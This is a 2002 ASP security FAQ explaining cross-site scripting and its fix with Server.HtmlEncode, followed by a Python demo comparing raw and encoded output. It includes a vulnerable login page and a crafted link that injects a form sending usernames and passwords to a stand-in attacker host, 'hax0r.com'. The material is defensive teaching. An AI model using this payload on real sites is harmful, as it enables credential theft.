Question:

What is the Cross Site Scripting security vulnerability? Am I at risk? How do I plug this security hole?



Answer: (This content is borrowed from Craig Atkin's article: Data Sanitization - Reducing Security Holes in an ASP Web Site...)

What is Cross Site Scripting?
Cross Site Scripting is a vulnerability that occurs when a Web site echoes user input back to the browser without properly sanitizing it first. Cross Site Scripting can be used to steal cookies, compromise data integrity, and trick users into submitting information to a hacker.

Consider a Web application that requires users to log in to visit a "secure" area. When logging in, users have to present their credentials - a username/password pair. All of the valid username/password pairs are maintained in a database. When the user wishes to view a secure area, she must provide her username and password, which is then checked to see if it exists within the user database table.

Now, imagine that this login system consisted of two pages: Login.asp, which created a form for the user to enter their username and password, and CheckCredentials.asp, which checked whether the user's supplied username/password pair was valid. Imagine further that, when the credentials were invalid, CheckCredentials.asp used a Response.Redirect to send the user back to Login.asp, passing along an errorMessage string in the querystring, like so:

CheckCredentials.asp
If rs.eof then
'user's credentials are not valid
Response.Redirect("Login.asp?errorMessage=Invalid+username+or+password")
Else
'user's credentials are valid, log them into the site...
End If

Then, in Login.asp, the errorMessage querystring value would be displayed as follows:

Login.asp
<form method="POST" action="CheckCredentials.asp">
<!-- display error message, if it exists -->
<%=request.querystring("errorMessage")%>

Username: <input type="text" name="UserName"><br>
Password: <input type="password" name="Password"><br>
<input type="submit" name="submit" value="log in!">
</form>

Using this (unsafe) technique, if the user attempts to log in with invalid credentials, they are returned to Login.asp and shown a short message explaining that their credentials were invalid. A clever hacker, though, could realize that he can alter the actual HTML of the page by providing an errorMessage value that contains HTML markup. For example, imagine that you visited Login.asp using the following URL:

http://www.somesite.com/Login.asp?errorMessage=</form><form method="POST" action="www.hax0r.com/passwordstealer.asp">

As we saw in the code for Login.asp, the errorMessage querystring value will be emitted, producing an HTML page with the following markup:

Login.asp
<form method="POST" action="CheckCredentials.asp">
</form><form method="POST" action="http://www.hax0r.com/stealPassword.asp">

Username: <input type="text" name="UserName"><br>
Password: <input type="password" name="Password"><br>
<input type="submit" name="submit" value="log in!">
</form>

The hacker has cleverly inserted some HTML into this page so that if an honest user were to visit the page with the supplied errorMessage querystring value, their supplied username and password would be submitted to the page http://www.hax0r.com/stealPassword.asp.

The hacker could now send a link to his contrived page via an email message, or post it as a link on some message board site or the like, hoping that a user of the site will click on the link and attempt to log in. Of course, by attempting to log in, the user will be submitting his data to the hacker's site. (The properly encoded form of the errorMessage querystring value in the URL would be: http://www.ourdomain.com/login.asp?errormsg=%3C%2Fform%3E%3Cform+method%3D%22POST%22+action%3D%22http://www%2Ehax0r%2Ecom%2FstealPassword%2Easp%22%3E.) The hacker "wins" if he can find someone who is tricked by this, clicks on his link, visits our Web site, and attempts to log in, thereby sending their username/password to the hacker's Web site.

How do we Protect Against Cross Site Scripting?
Protecting against a Cross Site Scripting attack is relatively simple: use the Server.HtmlEncode method. Server.HtmlEncode takes a string and replaces any characters that the browser would otherwise interpret as markup with their HTML entity encodings, so that the browser displays those characters literally on the screen instead. For example, if we call the Server.HtmlEncode method passing in:

</form><form method="POST" action="www.hax0r.com/passwordstealer.asp">

The resulting string will be:

&lt;/form&gt;&lt;form method=&quot;POST&quot; action=&quot;www.hax0r.com/passwordstealer.asp&quot;&gt;

To change our original code to use HTML encoding, we need to change the line in Login.asp that prints the value of errorMessage from <%=request.querystring("errorMessage")%> to <%=Server.HtmlEncode(request.querystring("errorMessage"))%>.

Once again, sanitization of data that is passed back to the browser should be performed on all data that has passed from an insecure source (the client). We should also sanitize any data that comes from any source and is passed back to the browser, as a hacker could break into our database/file system, insert his code into the correct record/file, and compromise our Web site in that manner. For a good article on Cross Site Scripting attacks, see: The Cross Site Scripting FAQ.
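To make the difference between the two versions of Login.asp concrete, here is an added Python example (not part of this FAQ or of Craig Atkin's article) that renders the login form with the raw and with the encoded errorMessage value and then checks which form's action a browser would POST the password to. Python's html.escape stands in for Server.HtmlEncode (it encodes the same &, <, >, " characters), and the crafted link is the URL-encoded one quoted above.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit
# Login.asp from the FAQ, with a slot where the errorMessage querystring value is emitted.
LOGIN_FORM = (
    '<form method="POST" action="CheckCredentials.asp">\n'
    '<!-- display error message, if it exists -->\n'
    '{error}\n'
    'Username: <input type="text" name="UserName"><br>\n'
    'Password: <input type="password" name="Password"><br>\n'
    '<input type="submit" name="submit" value="log in!">\n'
    '</form>\n'
)

def render_unsafe(error_message):
    """Mirrors <%=request.querystring("errorMessage")%>: raw insertion into the markup."""
    return LOGIN_FORM.format(error=error_message)

def render_safe(error_message):
    """Mirrors <%=Server.HtmlEncode(...)%>: &, <, >, " become entities the browser only displays."""
    return LOGIN_FORM.format(error=html.escape(error_message))

class PasswordFormFinder(HTMLParser):
    """Records the action of whichever <form> encloses the Password field when the page is parsed."""
    def __init__(self):
        super().__init__()
        self.current_action = self.password_posts_to = None
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.current_action = attrs.get("action")
        elif tag == "input" and attrs.get("name") == "Password":
            self.password_posts_to = self.current_action
    def handle_endtag(self, tag):
        if tag == "form":
            self.current_action = None

def password_destination(page):
    """Return the URL a browser would POST the password to for the given page markup."""
    finder = PasswordFormFinder()
    finder.feed(page)
    return finder.password_posts_to

def error_message_from_link(url):
    """Decode the error value as the server sees it (the FAQ's encoded link uses the key errormsg)."""
    return parse_qs(urlsplit(url).query)["errormsg"][0]

# The URL-encoded link quoted in the FAQ; decoding it yields the </form><form ...> markup.
CRAFTED_LINK = ("http://www.ourdomain.com/login.asp?errormsg=%3C%2Fform%3E%3Cform+method%3D%22POST%22"
               "+action%3D%22http://www%2Ehax0r%2Ecom%2FstealPassword%2Easp%22%3E")
```

With the raw insertion the Password field ends up inside the attacker's form; with the encoded insertion the page contains a single form posting to CheckCredentials.asp and the injected markup is merely displayed as text.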

More information on security vulnerabilities in web applications can be found at: http://www.owasp.org/asac


FAQ posted by Scott Mitchell at 11/26/2002 10:44:16 PM to the Security category. This FAQ has been viewed 45,510 times.
